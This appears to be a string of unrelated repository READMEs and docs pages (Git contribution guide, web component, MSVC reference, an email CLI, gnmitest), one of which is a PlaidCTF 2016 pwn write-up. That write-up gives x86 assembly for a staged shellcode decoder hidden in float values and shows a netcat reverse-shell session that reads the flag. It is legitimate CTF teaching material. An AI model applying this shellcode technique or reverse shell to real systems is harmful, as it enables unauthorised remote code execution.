# <a name="contribute-to-this-documentation"></a>Contribute to this documentation
Thank you for your interest in this documentation!
* [Ways to contribute](#ways-to-contribute)
* [Contribute using GitHub](#contribute-using-github)
* [Contribute using Git](#contribute-using-git)
* [How to use Markdown to format your topic](#how-to-use-markdown-to-format-your-topic)
* [FAQ](#faq)
* [More resources](#more-resources)
## <a name="ways-to-contribute"></a>Ways to contribute
Here are some ways to contribute to this documentation:
* To make small changes to an article, see [Contribute using GitHub](#contribute-using-github).
* To make large changes, or changes that involve code, see [Contribute using Git](#contribute-using-git).
* Report documentation bugs using GitHub Issues.
* Request new documentation at the [Excel for the web UserVoice site](https://excel.uservoice.com/forums/274580-excel-for-the-web?category_id=143439).
## <a name="contribute-using-github"></a>Contribute using GitHub
Use GitHub to contribute to this documentation without having to clone the repository to your desktop. This is the easiest way to create a pull request in this repository. Use this method to make minor changes that don't involve code changes.
**Note**: Using this method allows you to contribute to one article at a time.
### <a name="to-contribute-using-github"></a>To contribute using GitHub
1. Find the article you want to contribute to on GitHub.
2. Once you are on the article in GitHub, sign in to GitHub (go to [Join GitHub](https://github.com/join) for a free account).
3. Choose the **pencil icon** (Edit the file in your fork of this project) and make your changes in the **<> Edit file** window.
4. Scroll to the bottom and enter a description.
5. Choose **Propose file change** > **Create pull request**.
You have now successfully submitted a pull request. Pull requests are typically reviewed within 10 business days.
## <a name="contribute-using-git"></a>Contribute using Git
Use Git to contribute substantive changes, such as:
* Contributing code.
* Contributing changes that affect meaning.
* Contributing large changes to text.
* Adding new topics.
### <a name="to-contribute-using-git"></a>To contribute using Git
1. If you don't have a GitHub account, set one up at [GitHub](https://github.com/join).
2. After you have an account, install Git on your computer. Follow the steps in the [Set up Git] tutorial.
3. To submit a pull request using Git, follow the steps in [Use GitHub, Git, and this repository](#use-github-git-and-this-repository).
4. You will be asked to sign the Contributor's License Agreement if you are:
* A member of the Microsoft Open Technologies group.
* A contributor who doesn't work for Microsoft.
Community members must sign the Contribution License Agreement (CLA) before they can make large contributions to a project. You only need to complete and submit the CLA document once, so review it carefully; in some cases your employer may also be required to sign it.
Signing the CLA does not grant you commit rights to the main repository, but it does mean that the Office Developer and Office Developer Content Publishing teams will be able to review and approve your contributions. Your submissions are credited to you.
Pull requests are typically reviewed within 10 business days.
## <a name="use-github-git-and-this-repository"></a>Use GitHub, Git, and this repository
**Note:** Most of the information in this section can be found in the [GitHub Help] articles. If you're already familiar with Git and GitHub, skip to the **Contribute and edit content** section for the specifics of the code/content flow of this repository.
### <a name="to-set-up-your-fork-of-the-repository"></a>To set up your fork of the repository
1. Set up a GitHub account so you can contribute to this project. If you haven't done this yet, go to [GitHub](https://github.com/join) and do it now.
2. Install Git on your computer. Follow the steps in the [Set up Git] tutorial.
3. Create your own fork of this repository. To do this, choose the **Fork** button at the top of the page.
4. Copy your fork to your computer. To do this, open Git Bash. At the command prompt, enter:
    git clone https://github.com/<your user name>/<repo name>.git

Next, create a reference to the root repository by entering these commands:

    cd <repo name>
    git remote add upstream https://github.com/OfficeDev/<repo name>.git
    git fetch upstream
Congratulations! You've now set up your repository. You won't need to repeat these steps again.
### <a name="contribute-and-edit-content"></a>Contribute and edit content
To make the contribution process as seamless as possible, follow these steps.
#### <a name="to-contribute-and-edit-content"></a>To contribute and edit content
1. Create a new branch.
2. Add new content or edit existing content.
3. Submit a pull request to the main repository.
4. Delete the branch.
**Important** Limit each branch to a single concept/article to streamline the workflow and reduce the chance of merge conflicts. Content appropriate for a new branch includes:
* A new article.
* Spelling and grammar edits.
* Applying a single formatting change across a large set of articles (for example, applying a new copyright footer).
#### <a name="to-create-a-new-branch"></a>To create a new branch
1. Open Git Bash.
2. At the Git Bash command prompt, type `git pull upstream master:<new branch name>`. This creates a new branch locally that is copied from the latest OfficeDev master branch.
3. At the Git Bash command prompt, type `git push origin <new branch name>`. This alerts GitHub to the new branch. You should now see the new branch in your fork of the repository on GitHub.
4. At the Git Bash command prompt, type `git checkout <new branch name>` to switch to your new branch.
#### <a name="add-new-content-or-edit-existing-content"></a>Add new content or edit existing content
You navigate to the repository on your computer by using File Explorer. The repository files are in `C:\Users\<yourusername>\<repo name>`.
To edit files, open them in the editor of your choice and make your changes. To create a new file, use your preferred editor and save the new file in the appropriate location in your local copy of the repository. While working, be sure to save your work frequently.
The files in `C:\Users\<yourusername>\<repo name>` are a working copy of the new branch that you created in your local repository. Changing anything in this folder doesn't affect the local repository until you commit a change. To commit a change to the local repository, type the following commands in GitBash:
    git add .
    git commit -v -a -m "<Describe the changes made in this commit>"
The `add` command adds your changes to a staging area in preparation for committing them to the repository. The period after the `add` command specifies that you want to stage all of the files you have added or modified, checking subfolders recursively. (If you don't want to commit all of the changes, you can add specific files. You can also undo a commit. For help, type `git add -help` or `git status`.)
The `commit` command applies the staged changes to the repository. The `-m` switch means you are providing the commit comment on the command line. The -v and -a switches can be omitted. The -v switch gives verbose output from the command, and -a does what you already did with the add command.
You can commit multiple times while you are doing your work, or you can commit once when you're done.
#### <a name="submit-a-pull-request-to-the-main-repository"></a>Submit a pull request to the main repository
When you're finished with your work and are ready to have it merged into the main repository, follow these steps.
#### <a name="to-submit-a-pull-request-to-the-main-repository"></a>To submit a pull request to the main repository
1. In the Git Bash command prompt, type `git push origin <new branch name>`. In your local repository, `origin` refers to your GitHub repository that you cloned the local repository from. This command pushes the current state of your new branch, including all commits made in the previous steps, to your GitHub fork.
2. In your fork on the GitHub site, navigate to the new branch.
3. Choose the **Pull Request** button at the top of the page.
4. Verify the Base branch is `OfficeDev/<repo name>@master` and the Head branch is `<your username>/<repo name>@<branch name>`.
5. Choose the **Update Commit Range** button.
6. Give your pull request a title, and describe all the changes you're making.
7. Submit the pull request.
One of the site administrators will process your pull request. Your pull request will surface on the OfficeDev/<repo name> site under Issues. When the pull request is accepted, the issue will be resolved.
#### <a name="create-a-new-branch-after-merge"></a>Create a new branch after merge
After a branch is successfully merged (that is, after your pull request is accepted), don't continue working in that local branch. Doing so can lead to merge conflicts if you submit another pull request. Instead, to do another update, create a new local branch from the successfully merged upstream branch, and then delete your initial local branch.
For example, suppose your local branch X was successfully merged into the OfficeDev/office-scripts-docs master branch, and you want to make additional updates to the content that was merged. Create a new local branch, X2, from the OfficeDev/office-scripts-docs master branch. To do this, open Git Bash and execute the following commands:
    cd office-scripts-docs
    git pull upstream master:X2
    git push origin X2
You now have local copies (in a new local branch) of the work that you submitted in branch X. The X2 branch also contains all the work other writers have merged, so if your work depends on others' work (for example, a shared image), it is available in the new branch. You can verify that your previous work (and the work of other writers) is in the branch by checking out the new branch...
    git checkout X2
...and verifying the content. (The `checkout` command updates the files in `C:\Users\<yourusername>\office-scripts-docs` to the current state of the X2 branch.) Once you check out the new branch, you can make updates to the content and commit them as usual. However, to avoid working in the merged branch (X) by mistake, it's best to delete it (see the following **Delete a branch** section).
#### <a name="delete-a-branch"></a>Delete a branch
Once your changes are merged into the main repository, delete the branch you used, because you no longer need it. Any additional work should be done in a new branch.
#### <a name="to-delete-a-branch"></a>To delete a branch
1. In the Git Bash command prompt, type `git checkout master`. This ensures that you aren't in the branch to be deleted (which isn't allowed).
2. Next, at the command prompt, type `git branch -d <branch name>`. This deletes the branch on your computer only if it has been successfully merged to the upstream repository. (You can override this behavior with the `–D` flag, but first be sure you want to do this.)
3. Finally, type `git push origin :<branch name>` at the command prompt (a space before the colon and no space after it). This will delete the branch on your GitHub fork.
Congratulations! You have successfully contributed to the project.
## <a name="how-to-use-markdown-to-format-your-topic"></a>How to use Markdown to format your topic
### <a name="markdown"></a>Markdown
All of the articles in this repository use Markdown. A full introduction (and listing of all of its syntax) can be found at [Daring Fireball - Markdown].
## <a name="faq"></a>FAQ
### <a name="how-do-i-get-a-github-account"></a>How do I get a GitHub account?
Fill out the form at [Join GitHub](https://github.com/join) to open a free GitHub account.
### <a name="where-do-i-get-a-contributors-license-agreement"></a>Where do I get a Contributor's License Agreement?
You will automatically be sent a notice that you need to sign the Contributor's License Agreement (CLA) if your pull request requires one.
As a community member, **you must sign the Contribution License Agreement (CLA) before you can make large contributions to this project**. You only need to complete and submit the CLA document once, so review it carefully; in some cases your employer may also be required to sign it.
### <a name="what-happens-with-my-contributions"></a>What happens with my contributions?
When you submit your changes via a pull request, our team will be notified and will review your pull request. You will receive notifications about your pull request from GitHub; you may also be notified by someone from our team if we need more information. If your pull request is approved, we will update the documentation. We reserve the right to edit your submission for legal reasons, style, clarity, or other issues.
### <a name="can-i-become-an-approver-for-this-repositorys-github-pull-requests"></a>Can I become an approver for this repository's GitHub pull requests?
Currently, we are not allowing external contributors to approve pull requests in this repository.
### <a name="how-soon-will-i-get-a-response-about-my-change-request"></a>How soon will I get a response about my change request?
Pull requests are typically reviewed within 10 business days.
## <a name="more-resources"></a>More resources
* To learn more about Markdown, go to the Markdown creator's site: [Daring Fireball].
* To learn more about using Git and GitHub, first check out [GitHub Help].
[GitHub Home]: http://github.com
[GitHub Help]: http://help.github.com/
[Set up Git]: https://help.github.com/articles/set-up-git/
[Daring Fireball - Markdown]: http://daringfireball.net/projects/markdown/
[Daring Fireball]: http://daringfireball.net/
# <kwc-i18n>
> A web component used to manage internationalization
## Install
Install the component using [Bower](http://bower.io/):
```sh
$ bower install kwc-i18n --save
```
Or [download as ZIP](https://github.com/successk/kwc-i18n/archive/master.zip).
## Usage
1 – Import polyfill:
```html
<script src="bower_components/webcomponentsjs/webcomponents-lite.min.js"></script>
```
2 – Import custom element:
```html
<link rel="import" href="bower_components/kwc-i18n/kwc-i18n.html">
```
3 – Start using it!
```html
<kwc-i18n key="my.key" show></kwc-i18n>
<!-- You need to be inside a component to use var -->
<kwc-i18n key="my.key.invar" var="{{myvar}}"></kwc-i18n>
<input type="text" placeholder="[[myvar]]">
```
4 - On your index page, put the following code:
```html
<!-- Needs to import component here too. -->
<link rel="import" href="bower_components/kwc-i18n/kwc-i18n.html">
<!-- ... -->
<script>
document.addEventListener('HTMLImportsLoaded', function() {
window.kwc_i18n.setup({
// Where find your message ({locale} will be replaced by locale value (eg: "en", "fr"))
source: "messages/{locale}.json",
// Which locale to use by default?
locale: "en",
// Save the configuration into localStorage with key "kwc-i18n", replace source and locale with saved values
// useful when user locale can change and should not be reset each time the page load
save: "localStorage[kwc-i18n]",
// Date of the last translation changed (if null, always fetch translation)
date: new Date(),
// If true, ignore saved configuration and reset service
force: true
})
})
// change locale anywhere it will reload all translations
window.kwc_i18n.locale = "fr"
</script>
```
## Options
Attribute | Options | Default | Description
--- | --- | --- | ---
`key` | *String* | `null` | The message key, as you will call it in js (ex: "my.super.key")
`show` | *boolean* | `false` | If set, show the message
`var` | *{{variable}}* | `null` | If set, register the translation result into the variable
## Children
Selector | Description
--- | ---
None | -
## Methods
Method | Parameters | Returns | Description
--- | --- | --- | ---
None | - | - | -
## Events
Event | Detail | Description
--- | --- | ---
None | - | -
## Styles
Name | Default | Description
--- | --- | ---
None | - | -
## Development
In order to run it locally you'll need to fetch some dependencies and a basic server setup.
1 – Install [bower](http://bower.io/) & [polyserve](https://npmjs.com/polyserve):
```sh
$ npm install -g bower polyserve
```
2 – Install local dependencies:
```sh
$ bower install
```
3 – Start development server and open `http://localhost:8080/components/kwc-i18n/`.
```sh
$ polyserve
```
## History
For detailed changelog, check [Releases](https://github.com/successk/kwc-i18n/releases).
## License
MIT
# friendly-invention
react-demo(es6)
# MessengerBot
A Facebook messenger chatting bot project.
## PlaidCTF 2016 - fixedpoint (Pwn 175)
##### 15/04 - 17/02/2016 (48hr)
___
### Description:
IEEE754 is useful when your values go from -inf to +inf, but really, fixed point is all you need.
But if you want, you could grab this too.
Running at fixedpoint.pwning.xxx:7777
___
### Solution
In this weird challenge, source code is given:
```c
#include <stdlib.h>
#include <sys/mman.h>
#include <stdio.h>
int main(int argc, char** argv) {
float* array = mmap(0, sizeof(float)*8192, 7, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
int i;
int temp;
float ftemp;
for (i = 0; i < 8192; i++) {
if (!scanf("%d", &temp)) break;
array[i] = ((float)temp)/1337.0;
}
write(1, "here we go\n", 11);
(*(void(*)())array)();
}
```
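Before attacking it, it helps to reproduce the loop in a few lines: every integer read from stdin becomes four bytes of the executable buffer, namely the little-endian single-precision encoding of `temp/1337.0`. A quick sketch of that mapping (the helper name is ours):

```python
import struct

def memory_image(temps):
    """Simulate the C loop: each input integer temp is stored as the
    single-precision float temp/1337.0.  For |temp| < 2**24 the
    int-to-float cast in the C code is exact, so plain division
    followed by rounding to float reproduces it."""
    return b"".join(struct.pack("<f", t / 1337.0) for t in temps)
```

Whatever bytes this produces for a chosen list of integers is exactly what the program jumps to.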
___
We can write and execute shellcode here, but we don't have much control over it. The division limits
us even more, as we have very limited control over the most significant and the 2nd most significant
bytes. We can define the problem now:
We can write 4-byte words to memory, of which we control only the 2 LSB. The other 2 bytes can
take very limited values. How can we execute an arbitrary shellcode?
The first idea is to use a shellcode that consists only of 2-byte instructions. Then we can place
the instructions in the 2 LSBytes and try to have instructions that do not affect the shellcode in
the remaining 2 MSB. To be honest I didn't try this approach, as a fancier solution came to my
mind:
Let's break our normal shellcode and inject it into the 2 LSB of each float number, ignoring what
the remaining 2 bytes contain. Then we'll have a very small, specially written shellcode that extracts
these 2 bytes and reconstructs the original shellcode. After that, we return to the reconstructed shellcode and execute it:
```
prolog
/---- jmp
|
| tuples:
| 0x????AABB
| 0x????CCDD
| ...
| 0x????YYZZ
|
\---> extract AABB CCDD ... YYZZ <----\
|
jmp ----------------------------/
```
This idea seems nice but there are some limitations. The "prolog" and "extract" parts can be
very tricky, and must consist of 2-byte (or 3-byte, if we're lucky) instructions. Let's start:
When we enter the shellcode region, eax points to the beginning of that region. If we want
to execute a single byte instruction, we're looking for an integer that after casting will
have the form: 0x??01ebKK
Here, KK is the desired 1 byte instruction and ?? can be anything. The idea is to execute KK
and then skip the last byte by executing a jmp +1. I found that there's an integer for every
1 byte instruction, so we're fine. Let's see the prolog:
```assembly
nop ; real reversers always start with nop
nop ;
push eax ;
push eax ;
pop edx ; edx = entry point
pop ebx ; ebx = entry point
jmp 70h ; skip tuples
```
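Hunting for such integers can be automated: brute-force candidate values of `temp` and keep the ones whose single-precision quotient ends in the byte(s) we need. A minimal sketch (the function name is ours):

```python
import struct

def find_temp(lo, hi=None, limit=1 << 22):
    """Return an integer temp whose stored float temp/1337.0 has the
    requested least-significant byte (and optionally the second byte).
    Mirrors array[i] = ((float)temp)/1337.0; the int-to-float cast is
    exact for temp < 2**24, so the search stays below that."""
    for temp in range(1, limit):
        b = struct.pack("<f", temp / 1337.0)  # little-endian float bytes
        if b[0] == lo and (hi is None or b[1] == hi):
            return temp
    return None
```

The same loop, comparing three bytes instead of one, finds the 0x??01ebKK words used for the single-byte-instruction trick above.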
Note the first limitation here: the jump instruction must be 2 bytes long, so the maximum (positive)
offset is 0x7F. With 2 bytes of shellcode per 4 bytes, we can have up to 62 bytes of shellcode.
That's OK for a /bin/sh, but not for other ones.
Then the hard part follows: extracting this shellcode and executing it. If we extract the shellcode
at the beginning of the buffer and do not modify eax, then we can do a "jmp eax" (which is only 2
bytes) and jump to the shellcode.
Let's see the "extract" part:
```assembly
mov bl, 0x1c ; bl points to the tuple area (addresses are fixed)
xor ecx, ecx ; ecx = 0
mov cl, 0x20 ; ecx = 32
EXTRACT_NEXT:
push word ptr [ebx] ; first 2 bytes of the shellcode on stack (3B instruction)
inc ebx ; move on the next tuple
inc ebx ;
inc ebx ;
inc ebx ;
push word ptr [ebx] ; next 2 bytes of the shellcode on stack (3B instruction)
inc ebx ; move on the next tuple
inc ebx ;
inc ebx ;
inc ebx ;
pop ebp ; ebp contains 4 bytes of the shellcode (watch out endianess)
mov dword ptr [edx], ebp ; store the 4 bytes at the beginning of the region (2B instruction)
inc edx ; move on the next free slot
inc edx ;
inc edx ;
inc edx ;
loop EXTRACT_NEXT ; repeat until ecx = 0
nop ; we love nops!
nop ;
jmp eax ; jump to the shellcode
```
It's possible to find such integers to execute the above code. Fortunately for us, when we use 3-byte
instructions, the MSB (over which we have limited control) is a number between 0x40 and 0x48, which are valid
1-byte instructions. So if we have the sequence 0x48 - 0x40 (or the opposite) we get a nop
equivalent (dec eax; inc eax).
Everything seems wonderful so far, and we can execute an arbitrary shellcode. I tried the classic 23-byte
/bin/sh shellcode but it didn't work :\ This was expected, as there's no setbuf() in the binary,
which means that we need a reverse TCP shellcode. However, the smallest one I found was 72 bytes!
That's too bad, as we can have at most 62 bytes of shellcode. Fortunately, this idea can be extended:
```
prolog
/---- jmp
|
| tuples:
| 0x????AABB
| 0x????CCDD
| ...
| 0x????YYZZ
|
| /-----------------------\
| | |
| \/ |
\---> extract AABB CCDD ... YYZZ |
| |
adjust_pointers | |
/---- jmp | |
| | |
| more_tuples: | |
| 0x????EEFF | |
| 0x????GGHH | |
| ... | |
| 0x????WWXX | |
| | |
| /---------------/ |
| | |
| \/ |
\---> extract EEFF GGHH ... WWXX |
|
jmp ----------------------------/
```
So we can split the shellcode in 2 parts and merge them together during "extract". This
gives us space for 124 bytes, which is more than enough. In order to keep the offsets
consistent, we pad each part of the shellcode with our favorite instruction (guess which :P).
The "adjust" part consists of a single instruction:
```assembly
mov bl, 0xec ; bl points to the new tuple area (addresses are fixed)
```
The edx register wasn't modified, so the new extract will continue pushing shellcode right after
the first part.
Finally, the whole shellcode will be:
```assembly
nop ;
nop ;
push eax ;
push eax ;
pop edx ;
pop ebx ;
jmp SKIP_TUPLES_1 ;
;
; 1st part of the shellcode
;
SKIP_TUPLES_1:
mov bl, 0x1c ;
xor ecx, ecx ;
mov cl, 0x20 ;
EXTRACT_NEXT:
push word ptr [ebx] ;
inc ebx ;
inc ebx ;
inc ebx ;
inc ebx ;
push word ptr [ebx] ;
inc ebx ;
inc ebx ;
inc ebx ;
inc ebx ;
pop ebp ;
mov dword ptr [edx], ebp ;
inc edx ;
inc edx ;
inc edx ;
inc edx ;
loop EXTRACT_NEXT ;
nop ;
nop ;
mov bl, 0xec ;
jmp SKIP_TUPLES_2 ;
;
; 2nd part of the shellcode
;
SKIP_TUPLES_2:
xor ecx, ecx ;
mov cl, 0x20 ;
EXTRACT_NEXT_2:
push word ptr [ebx] ;
inc ebx ;
inc ebx ;
inc ebx ;
inc ebx ;
push word ptr [ebx] ;
inc ebx ;
inc ebx ;
inc ebx ;
inc ebx ;
pop ebp ;
mov dword ptr [edx], ebp ;
inc edx ;
inc edx ;
inc edx ;
inc edx ;
loop EXTRACT_NEXT_2 ;
nop ;
nop ;
jmp eax ; jump to the shellcode
```
The last thing that we have to note is the endianness. If we want to store the shellcode bytes 11 22 33 44,
the first 2 floats must be 0x????4433 0x????2211 (little endian).
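A small helper (ours, not from the original exploit code) makes the byte order concrete: it splits raw shellcode into the 16-bit words in the order the extractor's two `push word ptr [ebx]` instructions expect them:

```python
def to_tuples(shellcode):
    """Split shellcode into 16-bit words, high half of each 4-byte
    group first, so the bytes 11 22 33 44 yield 0x4433, 0x2211."""
    sc = shellcode + b"\x90" * (-len(shellcode) % 4)  # pad with NOPs
    words = []
    for i in range(0, len(sc), 4):
        words.append((sc[i + 3] << 8) | sc[i + 2])  # pushed first: 0x4433
        words.append((sc[i + 1] << 8) | sc[i])      # pushed second: 0x2211
    return words
```

Each word then still needs to be wrapped in an integer that survives the division by 1337 before being fed to the program.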
After all this, the reverse TCP shellcode is working and we can get the flag:
`PCTF{why_isnt_IEEE_754_IEEE_7.54e2}`
The code fixedpoint_expl.c was used to generate the shellcode:
```
Terminal #1:
root@nogirl:~/ctf/plaidctf# gcc fixedpoint_expl.c -o fxp && ./fxp > B
root@nogirl:~/ctf/plaidctf# cat B | nc fixedpoint.pwning.xxx 7777
^C
(connection will open once you terminate netcat)
```
```
Terminal #2:
root@nogirl:~# nc -nvvl -p9743
listening on [any] 9743 ...
connect to [128.211.189.21] from (UNKNOWN) [13.90.215.254] 45300
ls -la
total 24
drwxr-xr-x 2 root root 4096 Apr 17 02:08 .
drwxr-xr-x 4 root root 4096 Apr 17 01:40 ..
-rwxr-xr-x 1 root root 7424 Apr 17 01:40 fixedpoint_02dc03c8a5ae299cf64c63ebab78fec7
-rw-r--r-- 1 root root 36 Apr 17 01:41 flag.txt
-rwxr-xr-x 1 root root 268 Apr 17 02:01 wrapper
id
uid=1001(problem) gid=1001(problem) groups=1001(problem)
cat flag.txt
PCTF{why_isnt_IEEE_754_IEEE_7.54e2}
exit
sent 28, rcvd 373
```
___
---
title: "_aligned_free_dbg | Microsoft Docs"
ms.custom: ""
ms.date: "11/04/2016"
ms.technology: ["cpp-standard-libraries"]
ms.topic: "reference"
apiname: ["_aligned_free_dbg"]
apilocation: ["msvcrt.dll", "msvcr80.dll", "msvcr90.dll", "msvcr100.dll", "msvcr100_clr0400.dll", "msvcr110.dll", "msvcr110_clr0400.dll", "msvcr120.dll", "msvcr120_clr0400.dll", "ucrtbase.dll"]
apitype: "DLLExport"
f1_keywords: ["_aligned_free_dbg", "aligned_free_dbg"]
dev_langs: ["C++"]
helpviewer_keywords: ["_aligned_free_dbg function", "aligned_free_dbg function"]
ms.assetid: eb0cb3c8-0992-4db8-bac3-65f1b8311ca6
author: "corob-msft"
ms.author: "corob"
ms.workload: ["cplusplus"]
---
# _aligned_free_dbg
Frees a block of memory that was allocated with [_aligned_malloc](aligned-malloc.md) or [_aligned_offset_malloc](aligned-offset-malloc.md) (debug only).
## Syntax
```C
void _aligned_free_dbg(
void *memblock
);
```
### Parameters
*memblock*<br/>
A pointer to the memory block that was returned by the [_aligned_malloc](aligned-malloc.md) or [_aligned_offset_malloc](aligned-offset-malloc.md) function.
## Remarks
The **_aligned_free_dbg** function is a debug version of the [_aligned_free](aligned-free.md) function. When [_DEBUG](../../c-runtime-library/debug.md) is not defined, each call to **_aligned_free_dbg** is reduced to a call to `_aligned_free`. Both `_aligned_free` and **_aligned_free_dbg** free a memory block in the base heap, but **_aligned_free_dbg** accommodates a debugging feature: the ability to keep freed blocks in the heap's linked list to simulate low memory conditions.
**_aligned_free_dbg** performs a validity check on all specified files and block locations before performing the free operation. The application is not expected to provide this information. When a memory block is freed, the debug heap manager automatically checks the integrity of the buffers on either side of the user portion and issues an error report if overwriting has occurred. If the _CRTDBG_DELAY_FREE_MEM_DF bit field of the [_crtDbgFlag](../../c-runtime-library/crtdbgflag.md) flag is set, the freed block is filled with the value 0xDD, assigned the _FREE_BLOCK block type, and kept in the heap's linked list of memory blocks.
If an error occurs in freeing the memory, `errno` is set with information from the operating system on the nature of the failure. For more information, see [errno, _doserrno, _sys_errlist, and _sys_nerr](../../c-runtime-library/errno-doserrno-sys-errlist-and-sys-nerr.md).
For information about how memory blocks are allocated, initialized, and managed in the debug version of the base heap, see [CRT Debug Heap Details](/visualstudio/debugger/crt-debug-heap-details). For information about the allocation block types and how they are used, see [Types of blocks on the debug heap](/visualstudio/debugger/crt-debug-heap-details). For information about the differences between calling a standard heap function and its debug version in a debug build of an application, see [Debug Versions of Heap Allocation Functions](/visualstudio/debugger/debug-versions-of-heap-allocation-functions).
## Requirements
|Routine|Required header|
|-------------|---------------------|
|**_aligned_free_dbg**|\<crtdbg.h>|
For more compatibility information, see [Compatibility](../../c-runtime-library/compatibility.md).
## See also
[Debug Routines](../../c-runtime-library/debug-routines.md)
---
id: 15086
title: James A. Garfield
date: 2021-04-07T16:00:41+00:00
author: victor
layout: post
guid: https://ukdataservers.com/james-a-garfield/
permalink: /04/07/james-a-garfield
tags:
- show love
- unspecified
- single
- relationship
- engaged
- married
- complicated
- open relationship
- widowed
- separated
- divorced
- Husband
- Wife
- Boyfriend
- Girlfriend
category: Guides
---
* some text
{: toc}
## Who is James A. Garfield
The 20th U.S. President whose presidency lasted only 200 days and ended with his assassination by Charles J. Guiteau.
## Prior to Popularity
He had dreams of being a seaman, so he left home at 16 to become a canal driver.
## Random data
He served nine consecutive terms in the House of Representatives representing Ohio’s 19th district.
## Family & Everyday Life of James A. Garfield
His father passed away when he was 17 months old, leaving his mother, Eliza Ballou, to raise him alone.
## People Related With James A. Garfield
He was visiting Wall Street when Abraham Lincoln was assassinated and was prompted to give a speech to a rioting crowd in an effort to calm them down.
Mailstrom
=========
Mailstrom is a command-line script for sending emails via SMTP or Amazon SES.
It behaves similarly to the UNIX `mail` command, in that it can accept an email body via a pipe and then transmit it
over the configured protocol to the specified destination:
    $> echo "Testing" | bin/mailstrom -s "My Subject" my.email@example.com
It can also be used interactively to write emails, just like `mail` (press Ctrl+D on a blank line to signal the end of input):
    $> mail -s "My Subject" my.email@example.com
    Dear Sir or Madam,
    I would like to tell you about how awesome the developer of Mailstrom is, and how
    you should totally follow his blog at http://whateverthing.com/ and perhaps even
    sign up for his forum-as-a-service offering at http://wtboard.com/
    Sincerely,
    Testy Q. McTesterson
    ^D
Sendmail and Postfix can be a hassle, and are largely overkill for most cloud servers, so with Mailstrom you can save
yourself the maintenance headaches of maintaining your own mail daemons on your multitude of servers/instances.
---
... this can be nothing else than the great whirlpool of the Maelström ...
... in the centre of the channel of the Maelström is an abyss penetrating the globe ...
... the ordinary accounts of this vortex had by no means prepared me for what I saw ...
---
Installation
------------
Fetch from GitHub and install dependencies using Composer:
    $> git clone git://github.com/beryllium/mailstrom mailstrom
    $> cd mailstrom
    $> curl -s https://getcomposer.org/installer | php
    $> ./composer.phar install
Configure it to be available in your $PATH:
$> cd /usr/local/bin
$> ln -s /path/to/mailstrom/bin/mailstrom mailstrom
Or, if you wish, configure it as a drop-in replacement for the "mail" command (presuming it does not currently exist):
$> cd /usr/local/bin
$> ln -s /path/to/mailstrom/bin/mailstrom mail
Configuration
-------------
Mailstrom looks in /etc/mailstrom.ini and ~/.mailstrom.ini for connection settings, but you can also specify other fields (From/To/Subject/Message)
in the INI file. From/To/Subject/Message values specified on the command line take precedence over the INI values.
An example Amazon SES configuration file would look like:
access_key=AAAAAKAKKAKAK
secret_key=AEAET+/akakak
from=no-reply@example.com
Alternatively, an SMTP configuration file would specify a "type" (Amazon SES is assumed to be the default type) as well as SMTP-specific settings:
type=smtp
smtp_server=mail.example.com
smtp_port=25
smtp_user=username (optional)
smtp_pass=pass (optional)
smtp_encryption=ssl (optional. Supports ssl and tls. Omit this setting to leave encryption disabled.)
from=no-reply@example.com
**Note:** Some passwords with special characters may need to be quoted in the INI files, in order to prevent `parse_ini_file` from throwing errors:
smtp_pass="This password is SPECIAL!!!11!"
Usage
-----
As mentioned above, this is intended to be somewhat of a replacement for the `mail` command, so you can use it like this:
$> cat MyFile.txt | mailstrom --to user@example.com --subject "Output of MyFile.txt"
Or you can specify the message as a string:
$> mailstrom --to user@example.com --subject "Output of MyFile.txt" --message "My email message"
Credits
-------
Built by Kevin Boyd ( http://whateverthing.com | http://github.com/beryllium ) using Amazon's AWS SDK for PHP 2, GetOptionKit, and SwiftMailer.
Note: This project is in no way related to the Mailstrom "Inbox Zero" mail client.
# Understanding the gnmitest Suite proto message
The gnmitest service has an RPC called **Run**. It receives a `Suite` proto
message from a client and returns a `Report` proto message. The `Suite` message
contains connection information, and a test specification (including gNMI
message payloads, such as subscription paths). At a high level, the `Suite`
message contains a list of `InstanceGroup` messages to execute sequentially.
Each `InstanceGroup` contains a set of `Instance` messages to run in parallel.
`Instance` contains a `Test` message which specifies a particular test to be run
against a gNMI RPC.
A `Test` message can have either `SubscribeTest` or `GetSetTest` messages
specified. `SubscribeTest` describes a set of tests that can be run against the
gNMI `Subscribe` RPC. `GetSetTest` describes tests that can be run against
either `Get`, `Set`, or both. The other fields (`timeout`, `schema` and
`connection`) of the `Test` message may be set if the `Suite` level counterparts
are to be overridden.
For the `Subscribe` RPC the `SubscribeTest` message describes both the gNMI
`SubscribeRequest`, and hence the subscription information, as well as the test
to execute. The oneof `args` field in `SubscribeTest` indicates which test is
to be executed by the framework using the specified subscription (i.e., which
test handles the `SubscribeResponse` messages received). Some tests require
arguments, which are described in the message within the `args` `oneof`
corresponding to the test.
## Example Suite Message
The sample `Suite` message below demonstrates the high-level structure of a
gnmitest `Suite`:
```proto
name: "demo suite"
# duration in seconds a test is allowed to run.
timeout: 5
schema: "openconfig"
connection {
target: "_target_"
address: "_address_of_gnmi_server_"
# dial timeout.
timeout: 10
}
instance_group_list {
description: "existence check"
instance {
description: "has keys test for _target_"
test {
subscribe {
request {
subscribe {
prefix {
target: "_target_"
origin: "openconfig"
}
subscription {
}
mode: ONCE
}
}
has_keys {
path {
elem {
name: "components"
}
elem {
name: "component"
}
}
item {
key {
key: "name"
value: "_key_"
}
}
}
}
}
}
}
```
The `Suite` message above specifies a simple test that checks for the
presence of the key `_key_` in the `/components/component` OpenConfig list.
The test that executes this check is the `has_keys` test. The arguments supplied
are specified within the `has_keys` field of the `args` oneof.
When the `Suite` message is sent to the gnmitest runner, it
creates a subscription to the device with the given gNMI `SubscribeRequest` and
dispatches received messages to the `has_keys` test. The `Suite` level
configuration parameters are effective unless they are overridden by individual
tests:
* __timeout:__ Amount of time a test is allowed to run.
* __connection:__ Address and credentials to use while connecting to gNMI
target.
* __schema:__ An identifier to choose between registered Go representation of
OpenConfig schemas.
**Note**: By default, OpenConfig is assumed to be the schema that is
supported by the target. Other YANG schemas can be used by generating Go
code using [ygot](https://github.com/openconfig/ygot) and registering the
schema with gnmitest, (by creating a
[registration package](https://github.com/openconfig/gnmitest/blob/master/schemas/openconfig/register/openconfig.go)
and [importing it](https://github.com/openconfig/gnmitest/blob/8faacdae6b7a8bddbeb3781b1288f389e7d25c4e/service/service.go#L30)).
## Executing a gnmitest Suite
The gnmitest framework is exposed through the gnmitest service which is a gRPC
server. To start gnmitest service, you should run the following command:
```
go run $GOPATH/src/github.com/openconfig/gnmitest/cmd/gnmitest_service/gnmitest_service.go
```
**Note:** Host and port to start the service can be configured with `bind` and
